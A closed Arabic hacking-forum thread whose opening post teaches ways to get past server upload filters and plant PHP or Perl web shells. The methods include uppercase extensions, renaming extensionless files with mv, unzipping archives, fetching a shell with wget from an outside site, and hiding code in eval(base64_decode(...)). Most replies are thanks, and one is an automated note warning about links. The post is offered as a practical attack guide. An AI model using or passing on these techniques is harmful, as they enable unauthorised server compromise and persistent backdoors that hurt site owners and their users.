حالة الموضوع:
مغلق
  1. kes-kbz

    kes-kbz Developer

    الأنتساب:
    ‏13 مايو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    SeCuRiTy & HaCKeD
    الإقامة:
    K.$.A
    السلام عليكم ورحمة الله وبركاته

    ندخل بصلب الموضوع .. طبعا حماية منع رفع الملفات عقدة *:"

    وتعقد منها الكثير ربما .. وحبيت انزل لها الحل الجذري باذن الله :{13}:

    وسأتطرق لطرق عديدة ان شاء الله...

    في هذا الموضوع راح اتكلم عن طرق لتخطي هذي المشكلة

    طيب هذه الحماية باختصار فلترة للملفات المرفوعة ..

    يعني مثلا تجي ترفع سكربت يكون شل مثلا !!:{

    php او perl او غيره

    يجيك بعد عملية الرفع :

    Forbidden

    او

    Not Acceptable

    والحين راح نتخطى المشاكل هذي بعملية الرفع في السيرفر i:q^:

    طيب نجي للطريقة الاولى :

    1- ارفع اي ملف وليكن draadil.PHP

    غيرنا امتداد الملف الى PHP كابتل وهذي طريقة لتخطي فلترة

    امتدادات الملفات المرفوعة ...

    طيب نجي لطريقة ثانية :

    2- نرفع ملف الشل بدون امتداد مثال على ذلك :

    dr.aadil

    يعني ملف بدون صيغة غير معروف منزوع الامتداد

    وبعد عملية الرفع يتم تغيير اسم الملف الى : dr.aadil.php

    او

    dr.aadil.PHP

    ويتم تغيير اسم الملف بالامر التالي :
    كود PHP:
    mv dr.aadil dr.aadil.php 
    طيب الحين الطريقة الثالثة وهي انشاء ملف :

    3- يتم انشاء ملف من الشل او بالامر التالي :
    كود PHP:
    touch dr.aadil.php 
    ومن ثم يتم التعديل على الملف وحفظه ..

    الطريقة الرابعة وهي عن طريق رفع الملف مضغوط :

    4- ترفع ملف الشل او اي ملف بداخل ملف مضغوط zip

    ومن ثم تفك الضغط عنه بامر :
    كود PHP:
    unzip dr.aadil.zip 
    الطريقة الخامسة وهي عن طريق الشلات التي بها خاصية

    5- اختيار الملف لرفعه ومن ثم تغيير اسم الملف بعد الرفع ...

    وتنفع بتخطي مشكلة منع رفع الملفات ..

    الطريقة السادسة وهي عن طريق جلب الملف من خارج السيرفر

    6- تنسخ رابط ملف txt محتواه شل بيرل او غيره ومن ثم تستدعيه

    بالامر التالي مثال :
    كود PHP:
    wget http://site.com/dr.aadil.txt 
    وبعد جلبه يتم تغيير اسمه الى php او pl على حسب الملف

    الطريقة السابعة وهي عن طريق تشفير الملفات المرفوعة

    7- تشفر سورس الملف بالتشفيرات الشائعة

    مثلا تشفر ملف الشل php بهذه الطريقة :

    كود PHP:
    <?
    eval(
    base64_decode('هنا تضع ناتج التشفير'));
    ?>
    والتشفيرات الاخرى وهكذا ...

    وفيه طريقة لتخطي رفع الملفات باداة التمبر داتا لخداع رفع الملفات

    معروفة وتنفع في التخطي في بعض السيرفرات ..

    ولاكن نزلت لكم الطرق هذي وان شاء الله راح ترفع ملفك رغم انف الحماية

    ... كذا انتهينى ...

    تحياتي للجميع .. والقادم افضل باذن الله &:":
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. AD4 Hacker

    AD4 Hacker Developer

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    Spammer
    رد: طرق تخطي منع رفع الملفات في السيرفر

    سملت يدآك حبيبي تستاهل لايك i:q^: ​
     
  4. Mr.Angel

    Mr.Angel Developer

    الأنتساب:
    ‏3 يونيو 2012
    المشاركات:
    33
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    iRaQ
    رد: طرق تخطي منع رفع الملفات في السيرفر

    شكرا على المجهود رائع
    بالتوفيق ..:{1}: ​
     
  5. asiko

    asiko Developer

    الأنتساب:
    ‏16 يناير 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: طرق تخطي منع رفع الملفات في السيرفر

    جزاك الله الف خير اخى الكريم!!:{​
     
  6. speeedh

    speeedh Developer

    الأنتساب:
    ‏21 مارس 2012
    المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: طرق تخطي منع رفع الملفات في السيرفر

    الف شكر ليك يا غالى​
     
  7. ساكن الروح

    ساكن الروح Developer

    الأنتساب:
    ‏16 سبتمبر 2011
    المشاركات:
    20
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: طرق تخطي منع رفع الملفات في السيرفر

    الله يعطيك العافيه مجهود تشكر عليه
    سلمت يدك اخي )5:"​
     
  8. black.boy

    black.boy Developer

    الأنتساب:
    ‏29 مايو 2012
    المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    iran
    رد: طرق تخطي منع رفع الملفات في السيرفر

    بارك الله فيك اخوى

    يعطيك الف عافية ​
     
  9. Dr.AnTi_HaCkEr

    Dr.AnTi_HaCkEr DeveloPer Plus

    الأنتساب:
    ‏8 مايو 2012
    المشاركات:
    103
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: طرق تخطي منع رفع الملفات في السيرفر

    آلله يعطيكـ آلعافيه

    تحيآتي
     
  10. al-swisre

    al-swisre DeveloPer Plus

    الأنتساب:
    ‏17 مايو 2011
    المشاركات:
    22
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    3
    الوظيفة:
    كيف الحال ؟
    الإقامة:
    .:: Al-Qassim ::.
    رد: طرق تخطي منع رفع الملفات في السيرفر

    كفوؤ واصل
    &:"
    جاري (+)
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة